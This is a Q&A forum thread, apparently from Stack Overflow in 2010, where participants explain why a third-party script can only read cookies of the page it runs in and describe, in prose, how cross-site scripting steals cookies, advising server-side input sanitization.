Say there is a site foo.com which loads JavaScript from site bar.com. Now, say the JavaScript from site bar.com tries to read cookies using document.cookies. I was under the impression that using JavaScript, you can read all the cookies set in the browser irrespective of their source. But it turns out that the JavaScript from the site bar.com can only access cookies set by bar.com and not any other. If this is the case, how are script injection attacks which steal cookies carried out?
views:
87answers:
3
A:
They load scripts inside the attacked page.
For instance, when comments in a blog system get compromised, they contain a script element that is executed when the page is rendered. This script can get the cookies and send it to the attacker's server.
That's why you should never trust user input and disallow at least certain tags in comments (or translate every < to <). But don't do this on the client side, as this prevention technique can easily be circumvented; test for (and change) malicious input on the server side.
Marcel Korpel
2010-07-29 14:40:22
+2
A:
But it turns out that the JavaScript from the site bar.com can only access cookies set by bar.com and not any other.
That isn't true. What matters is where the HTML document containing the <script> element is, not the URL of the JS file that said <script> mentions in the src attribute.
I suspect your problem is that you are accessing document.cookies when the property is called document.cookie (Singular!)
David Dorward
2010-07-29 14:41:41
That's also how CDNs work, like the jQuery script that is loaded on this site: `http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js` doesn't live on domain `stackoverflow.com`.
Marcel Korpel
2010-07-29 14:45:55
@David, cookie thing was a spelling mistake while typing the question. I just now tried with alert(document.cookie) and I just get a blank string in spite of cookies being set. I am pretty baffled.
roger
2010-07-29 14:59:31
I performed a test. The domain makes no different. Perhaps the cookies you are trying to fetch are on a different path, or set to be HTTP only.
David Dorward
2010-07-29 15:26:34
Cooke is not http only. Site foo.com contains script from site moo.bar.com and the cookie is set with domain bar.com(not moo.bar.com) with the path being /. This is the scenario I am testing and I am not able to read the cookies.
roger
2010-07-29 15:40:32
Then that is the problem. The script is running on foo.com so it can't read the cookie from bar.com — exactly as my answer said.
David Dorward
2010-07-29 15:49:33
Err? Yes. It is a bar.com cookie, it gets included in all requests to bar.com, including subdomains. You can't read it with a script where the script element is in an HTML document on foo.com.
David Dorward
2010-07-29 15:51:35
Oops. Got it. In cookie stealing it is the other way round. Script from bar.com residing in foo.com tries to read cookies from foo.com itself and not from bar.com. Thanks. Plugged the hole in my understanding.
roger
2010-07-29 15:55:25
A:
You can only access cookies which have been set for the given domain name. From the Wikipedia article on cookies:
Beside the name/value pair, a cookie may also contain an expiration date, a path, a domain name, and whether the cookie is intended only for encrypted connections. RFC 2965 mandates cookies have a version number, but this is usually omitted. These pieces of data follow the name=newvalue pair and are separated by semicolons. For example, a cookie can be created by the server by sending a line Set-Cookie: name=newvalue; expires=date; path=/; domain=.example.org.
The domain and path tell the browser that the cookie has to be sent back to the server when requesting URLs of a given domain and path. If not specified, they default to the domain and path of the object that was requested. As a result, the domain and path strings may tell the browser to send the cookie when it normally would not. For security reasons, the cookie is accepted only if the server is a member of the domain specified by the domain string.
If foo.com sent a cookie which had the domain name of bar.com, or even .com, then JavaSCript code on bar.com could read that cookie. However most browsers are configured to only accept cookies when the domain name matches, and would reject such a cookie.
Josh
2010-07-29 14:42:03
I verified that the cookie is present but JavaScript is not able to read it.
roger
2010-07-29 15:00:58